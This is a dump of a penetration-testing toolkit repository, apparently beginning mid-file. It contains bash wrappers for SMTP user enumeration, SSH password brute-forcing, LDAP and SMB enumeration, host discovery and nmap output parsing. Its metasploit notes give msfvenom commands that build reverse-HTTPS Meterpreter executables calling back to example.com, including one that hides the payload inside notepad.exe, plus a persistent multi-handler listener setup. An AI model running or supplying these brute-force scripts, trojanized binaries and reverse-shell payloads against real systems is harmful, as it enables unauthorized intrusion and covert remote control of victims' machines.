20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | msfconsole -n -q -r - << EOF
26 | use auxiliary/scanner/smtp/smtp_enum
27 | set RHOSTS $1
28 | run
29 | exit
30 | EOF
31 | else
32 |     echo "Please provide the target SMTP server."
33 | fi
34 | 


--------------------------------------------------------------------------------
/cracking/ssh-bf.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 3 ]; then
25 | 	patator ssh_login host=$1 user=$2 password=FILE0 0=$3
26 | else
27 |     echo "Please provide a target host, a username and a password list."
28 | fi
29 | 


--------------------------------------------------------------------------------
/firewall/subnetslist.example:
--------------------------------------------------------------------------------
1 | 192.168.1.1/24
2 | 192.168.2.1/23
3 | 192.168.3.1/27


--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-csv.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2024 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 
26 | egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-| sed 's/Ignored.*//g' | awk '{printf $1 ";" ; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s,", v[1]}; a=""; printf "\n"; }'
27 | 
28 | else
29 |   echo "Please provide a directory path."
30 | fi
31 | 


--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-matrix.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 
26 |   egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-| sed 's/Ignored.*//g' | awk '{printf $1 ";" NF-1 ";"; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s(%s),", v[1], v[5]}; a=""; printf "\n"; }'
27 | 
28 | else
29 |   echo "Please provide a directory path."
30 | fi
31 | 


--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-txt.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 
26 |   egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-| sed 's/Ignored.*//g' | awk '{printf "Host: " $1 "\nOpen ports: " NF-1 "\n"; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s\t%s\n", v[1], v[5]}; a=""; printf "\n"; }'
27 | 
28 | else
29 |   echo "Please provide a directory path."
30 | fi
31 | 


--------------------------------------------------------------------------------
/grep/grep-list-hosts-open-ports-and-services-to-matrix.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 
26 |   egrep -v "^#|Status: Up" *.gnmap|cut -d' ' -f2,4-|sed 's/Ignored.*//g' |sed 's/ /_/'| sed 's/, /,/g'| awk -v FS=_ '{printf $1 ";" NF ";"; $1=""; for(i=2; i<=NF; i++){ a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s(%s)[%s],", v[1], v[5], v[7]}; a=""; printf "\n"; }'
27 | 
28 | else
29 |   echo "Please provide a directory path."
30 | fi
31 | 


--------------------------------------------------------------------------------
/grep/grep-list-hosts-open-ports-and-services-to-txt.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 
26 |   egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-|sed 's/Ignored.*//g' |sed 's/ /'$'_''/'|sed 's/, /,/g'| awk -v FS=_ '{printf "Host: " $1 "\nOpen ports: " NF "\n"; $1=""; for(i=2; i<=NF; i++){ a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%-10s%-20s%s\n", v[1], v[5], v[7]}; a=""; printf "\n"; }'
27 | else
28 |   echo "Please provide a directory path."
29 | fi
30 | 


--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts-comma.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2019 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 	cat $1/*.gnmap | grep 'Status: Up' | cut -d ' ' -f2 | sort -V | uniq | tr '\n' ',' | sed 's/,$//g'
26 | 	echo 
27 | else
28 |   echo "Please provide a directory path."
29 | fi
30 | 


--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts-having-more-than-one-port-open.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2021 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 	cat $1/*.gnmap | grep "open.*open" | cut -d ' ' -f2 | sort -V | uniq
26 | else
27 |   echo "Please provide a directory path."
28 | fi
29 | 


--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 	cat $1/*.gnmap | grep 'Status: Up' | cut -d ' ' -f2 | sort -V | uniq
26 | else
27 |   echo "Please provide a directory path."
28 | fi
29 | 


--------------------------------------------------------------------------------
/grep/grep-unique-open-ports-comma.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2019 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 	cat $1/*.gnmap | grep "Ports:" | cut -d' ' -f4- | tr ',' '\n' | sed -n -e 's/\/open.*//p' | sed -e 's/^[ \t]*//' | sort -n | uniq | tr '\n' ',' | sed 's/,$//g'
26 | 	echo
27 | else
28 |   echo "Please provide a directory path."
29 | fi
30 | 


--------------------------------------------------------------------------------
/grep/grep-unique-open-ports.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [ $# -eq 1 ]; then
25 | 	cat $1/*.gnmap | grep "Ports:" | cut -d' ' -f4- | tr ',' '\n' | sed -n -e 's/\/open.*//p' | sed -e 's/^[ \t]*//' | sort -n | uniq
26 | else
27 |   echo "Please provide a directory path."
28 | fi
29 | 


--------------------------------------------------------------------------------
/ldap/scan-enum4linux.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	enum4linux -a -v -M -l -d $1 2>&1 | tee "enum4linux_$1.txt"
27 | else
28 |     echo "Please provide the target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/ldap/scan-ldapsearch.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 5 ]; then
26 | 	ldapsearch -v -x -D $3 -w $4 -p $2 -h $1 -b $5 -s sub "(objectclass=*)" 2>&1 | tee > "ldap_all-entries_$1_$2.txt"
27 | else
28 |     echo "Please provide the target host, port, username, password and base dn(dc=example,dc=com)."
29 | fi
30 | 


--------------------------------------------------------------------------------
/live-hosts/discover-live-hosts-oses.sh:
--------------------------------------------------------------------------------
 1 | 
 2 | #!/bin/bash
 3 | 
 4 | #    This file is part of PenTestKit
 5 | #    Copyright (C) 2017-2021 @maldevel
 6 | #    https://github.com/maldevel/PenTestKit
 7 | #
 8 | #    PenTestKit - Useful tools for Penetration Testing.
 9 | #
10 | #    This program is free software: you can redistribute it and/or modify
11 | #    it under the terms of the GNU General Public License as published by
12 | #    the Free Software Foundation, either version 3 of the License, or
13 | #    (at your option) any later version.
14 | #
15 | #    This program is distributed in the hope that it will be useful,
16 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
17 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
18 | #    GNU General Public License for more details.
19 | #
20 | #    You should have received a copy of the GNU General Public License
21 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
22 | #
23 | #    For more see the file 'LICENSE' for copying permission.
24 | 
25 | 
26 | if [[ $EUID -ne 0 ]]; then
27 |   echo "For better results, please run this script as root." 1>&2
28 |   exit 1
29 | fi
30 | 
31 | if [ $# -eq 1 ]; then
32 |   nmap -sS -vv -n -Pn --reason --open -T4 --top-ports 100 -O $1 | grep 'Nmap scan report for\|OS details\|Aggressive OS guesses\|Device type'| sed 's/Nmap scan report for /IP:/'|sed 's/Aggressive OS guesses/OS/'|sed 's/OS details/OS/'
33 | else
34 |   echo "Please provide the target ip range."
35 | fi
36 | 
37 | 


--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-arpscan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #    
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #   
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | # -I	Use network interface
26 | 
27 | if [[ $EUID -ne 0 ]]; then
28 |   echo "For better results, please run this script as root." 1>&2
29 |   exit 1
30 | fi
31 | 
32 | if [ $# -eq 2 ]; then
33 |   LOGNAME="local_live_hosts_arp_scan_$1.txt"
34 |   LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g')
35 |   arp-scan -N -q -I $1 $2 > $LOGNAME
36 | else
37 |   echo "Please provide your network device and the target ip range."
38 | fi
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-netbios.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2019 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | 
26 | if [[ $EUID -ne 0 ]]; then
27 |   echo "For better results, please run this script as root." 1>&2
28 |   exit 1
29 | fi
30 | 
31 | if [ $# -eq 1 ]; then
32 |   LOGNAME="local_live_hosts_netbios_$1.txt"
33 |   LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g')
34 |   nbtscan -e $1 > $LOGNAME
35 | else
36 |   echo "Please provide a target ip range."
37 | fi
38 | 
39 | 
40 | 


--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-netdiscover.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2019 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "For better results, please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 |   LOGNAME="local_live_hosts_netdiscover_$1.txt"
32 |   LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g')
33 |   netdiscover -i $1 -r $2 -s 100 -N -P > $LOGNAME
34 | else
35 |   echo "Please provide your network device and the target ip range."
36 | fi
37 | 
38 | 
39 | 


--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-passively-p0f.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2019 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | 
26 | if [[ $EUID -ne 0 ]]; then
27 |   echo "For better results, please run this script as root." 1>&2
28 |   exit 1
29 | fi
30 | 
31 | if [ $# -eq 1 ]; then
32 |   LOGNAME="local_live_hosts_p0f_$1.txt"
33 |   LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g')
34 |   p0f -i $1 > $LOGNAME
35 | else
36 |   echo "Please provide your network device."
37 | fi
38 | 
39 | 


--------------------------------------------------------------------------------
/live-hosts/ping-from-linux.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2023 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	for i in {1..254} ;do (ping -c 1 $1.$i | grep "bytes from" &) ;done
27 | else
28 | 	echo "Please provide part of the ip range e.g. 10.10.0."
29 | fi
30 | 
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------
/m365/Readme.md:
--------------------------------------------------------------------------------
 1 | ### Generate possible usernames
 2 | 
 3 | Take a name and transform it into possible username permutations:
 4 | 
 5 | * https://gist.github.com/superkojiman/11076951
 6 | 
 7 | ```
 8 | python3 namemash.py real_names.txt > permutations.txt
 9 | ```
10 | 


--------------------------------------------------------------------------------
/metasploit/binding.md:
--------------------------------------------------------------------------------
1 | ## File Binding
2 | 
3 | ### Executable files
4 | 
5 | ```bash
6 | msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe
7 | ```
8 | 


--------------------------------------------------------------------------------
/metasploit/multi-handler.md:
--------------------------------------------------------------------------------
 1 | ## Multi Handler
 2 | 
 3 | ### Run metasploit multi handler
 4 | 
 5 | ```bash
 6 | msfconsole
 7 | use exploit/multi/handler
 8 | set PAYLOAD windows/meterpreter/reverse_https
 9 | set LHOST example.com
10 | set LPORT 443
11 | ```
12 | 
13 | ### Session will never timeout
14 | 
15 | ```bash
16 | set SessionCommunicationTimeout 0
17 | ```
18 | 
19 | ### Execute commands on new session connection
20 | 
21 | ```bash
22 | set autorunscript multi_console_command -cl "screenshot","sysinfo"
23 | ```
24 | 
25 | ### Don’t exit once the first meterpreter connection is established
26 | 
27 | ```bash
28 | set ExitOnSession false
29 | ```
30 | 
31 | ### Run all meterpreter connections in the background automatically
32 | 
33 | ```bash
34 | exploit -j
35 | ```
36 | 
37 | ### List sessions
38 | 
39 | ```bash
40 | sessions -l
41 | ```
42 | 
43 | ### Interact with a shell
44 | 
45 | ```bash
46 | sessions -i 5
47 | ```
48 | 
49 | ### Send interaction with session 5 to background
50 | 
51 | Press ctrl+z
52 | 


--------------------------------------------------------------------------------
/metasploit/payloads.md:
--------------------------------------------------------------------------------
 1 | ## Payload Generation
 2 | 
 3 | ### Reverse https meterpreter
 4 | 
 5 | ```bash
 6 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe
 7 | ```
 8 | 
 9 | ```bash
10 | msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe
11 | ```
12 | 


--------------------------------------------------------------------------------
/misc/helpful-commands.md:
--------------------------------------------------------------------------------
1 | ## Helpful commands during PT
2 | 
3 | **duplicate the end of each line at the end of line itself**
4 | 
5 | ```bash
6 | paste -d ' ' filename1 filename1
7 | ```
8 | 
9 | 


--------------------------------------------------------------------------------
/misc/openvas.md:
--------------------------------------------------------------------------------
 1 | ## OpenVAS
 2 | 
 3 | ### Initializing & Starting OpenVAS
 4 | 
 5 | ```bash
 6 | apt-get install openvas 
 7 | openvas-setup 
 8 | openvas-start
 9 | ```
10 | 
11 | * https://127.0.0.1:9392
12 | 
13 | ```
14 | Username: admin 
15 | Password: OpenVAS setup script
16 | ```
17 | 


--------------------------------------------------------------------------------
/misc/port-forwarding.md:
--------------------------------------------------------------------------------
1 | ## Port Forwarding
2 | 
3 | ### Linux Port Forwarding
4 | 
5 | * rinetd
6 | 


--------------------------------------------------------------------------------
/misc/print-top-tcp-ports.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
